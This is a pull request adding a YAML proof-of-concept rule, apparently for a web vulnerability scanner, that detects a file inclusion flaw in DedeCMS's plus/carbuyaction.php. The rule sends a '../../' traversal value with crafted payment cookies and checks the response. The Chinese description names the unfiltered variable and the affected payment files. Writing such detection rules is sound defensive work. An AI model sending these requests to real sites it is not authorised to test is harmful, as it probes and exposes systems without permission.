### PR TITLE
Create dedecms-carbuyaction-fileinclude.yml

### DIFF
--- a/pocs/dedecms-carbuyaction-fileinclude.yml
+++ b/pocs/dedecms-carbuyaction-fileinclude.yml
@@ -1,0 +1,22 @@
+name: poc-yaml-dedecms-carbuyaction-fileinclude
+rules:
+  - method: GET
+    path: /plus/carbuyaction.php?dopost=return&code=../../
+    headers:
+      Cookie: code=alipay
+    follow_redirects: true
+    expression: |
+      response.status == 200
+  - method: GET
+    path: /plus/carbuyaction.php?dopost=return&code=../../
+    headers:
+      Cookie: code=cod
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
+
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "DedeCmsV5.6"
+  links:
+    - https://www.cnblogs.com/milantgh/p/3615986.html

--- a/pocs/dedecms-carbuyaction-fileinclude.yml
+++ b/pocs/dedecms-carbuyaction-fileinclude.yml
@@ -17,6 +17,6 @@ rules:
 
 detail:
   author: harris2015(https://github.com/harris2015)
-  Affected Version: "DedeCmsV5.6"
+  Affected Version: "DedeCmsV5.x"
   links:
     - https://www.cnblogs.com/milantgh/p/3615986.html


### PR DESCRIPTION

----------

## 本 poc 是检测什么漏洞的

DedeCMS内容管理系统软件采用XML名字空间风格核心模板：模板全部使用文件形式保存，对用户设计模板、网站升级转移均提供很大的便利，健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

plus/carbuyaction.php里没有对变量进行严格的过滤

出现漏洞的两个文件为：
Include/payment/alipay.php
Include/payment/yeepay.php

## 测试环境
网上环境 请私信

## 备注
暂无